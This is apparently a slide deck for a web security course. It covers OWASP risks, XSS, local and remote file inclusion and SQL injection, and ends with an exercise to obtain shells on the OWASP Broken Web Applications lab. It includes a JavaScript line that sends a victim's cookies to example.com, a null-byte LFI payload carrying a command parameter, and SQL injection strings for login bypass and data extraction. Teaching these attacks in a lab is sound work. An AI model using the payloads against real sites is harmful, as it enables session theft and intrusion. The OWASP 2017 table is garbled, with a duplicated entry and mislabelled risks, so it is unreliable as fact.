82 lines
3.2 KiB
Markdown
82 lines
3.2 KiB
Markdown
**Slide 1: Web Application Attacks**
|
|
- **Web applications** can be written in various languages, each with its specific vulnerability classes.
|
|
- Main attack vectors are similar in concept.
|
|
- OWASP promotes security awareness and solutions for web application development.
|
|
|
|
**Slide 2: OWASP Top-10 Security Risks**
|
|
|
|
| Risk | Description |
|
|
| --- | --- |
|
|
| A1:2017 - Injection | Attacker can add malicious SQL, NoSQL, or command strings. |
|
|
| A2:2017 - Broken Authentication | Compromised credentials, weak defaults, or exposed keys. |
|
|
| A3:2017 - Sensitive Data Exposure | Unprotected data at rest or in transit. |
|
|
| A4:2017 - XML External Entity (XXE) | Attacker can exploit parsing of XML outside the standard. |
|
|
| A5:2017 - Security Misconfiguration | Default configurations, open cloud storage, misconfigured HTTP headers. |
|
|
| A6:2017 - Using Components with Known Vulnerabilities | Outdated or vulnerable libraries and frameworks. |
|
|
| A7:2017 - Insufficient Logging & Monitoring | Lack of logging and monitoring prevents detection of attacks. |
|
|
| A8:2017 - Insecure Deserialization | Vulnerable deserialization can lead to remote code execution. |
|
|
| A9:2017 - Using Known Vulnerable Components without Patching | Outdated software with known vulnerabilities. |
|
|
| A10:2017 - Insufficient Transport Layer Protection | Weak or no encryption, allowing man-in-the-middle attacks. |
|
|
|
|
**Slide 3: Cross-Site Scripting (XSS)**
|
|
- Unsanitized user input displayed as HTML.
|
|
- Allows malicious scripts to run in victim's browser.
|
|
- Reflected (non-persistent): injected script runs immediately when the victim clicks the link.
|
|
- Stored (persistent): web application delivers payload to the victim, script runs when viewed.
|
|
- Impact: cookie stealing, authentication bypass, redirection.
|
|
|
|
**Slide 4: XSS Example**
|
|
- Reflected XSS:
|
|
|
|
```html
|
|
<h1>XSS demo</h1>
|
|
<?php echo "Hello ". $_GET['name'];?>
|
|
```
|
|
|
|
- Stored XSS:
|
|
|
|
```html
|
|
<script>alert(1)</script>
|
|
```
|
|
|
|
**Slide 5: Cookie Stealing via XSS**
|
|
- JavaScript can make victim's browser send cookies to the attacker.
|
|
|
|
```javascript
|
|
new Image().src="http://example.com/bogus.php?output="+document.cookie;
|
|
```
|
|
|
|
**Slide 6: File Inclusion Vulnerabilities**
|
|
- Local File Inclusion (LFI) and Remote File Inclusion (RFI):
|
|
- LFI: includes local files.
|
|
- RFI: introduces own code to the webserver.
|
|
- Exploit depends on PHP versions and web server configurations.
|
|
|
|
**Slide 7: LFI Demonstration**
|
|
- Unsanitized `lang` parameter:
|
|
|
|
```php
|
|
<?php $lang=$_GET['lang']; include $lang.".php";?>
|
|
```
|
|
|
|
- Payload:
|
|
|
|
```bash
|
|
../uploads/avatars/image.jpg%00&cmd=ifconfig
|
|
```
|
|
|
|
**Slide 8: SQL Injection**
|
|
- Unsanitized user input passed to a database query.
|
|
- Manipulating data can change the nature of the query.
|
|
- Examples:
|
|
- Bypassing authentication with `' OR '1'='1`
|
|
- Extracting data using `' union select * from information_schema.columns --`
|
|
|
|
**Exercise:**
|
|
- Using OWASP Broken Web Applications project, demonstrate obtaining a shell with:
|
|
- An LFI vulnerability in the web application with file upload.
|
|
- An LFI vulnerability in the web application with contaminated logs.
|
|
- An RFI vulnerability in the web application.
|
|
- Demonstrate attacks using SQL injection and Cross Site Scripting (XSS).
|
|
- Provide documentation and proof of useful attacks in your report.
|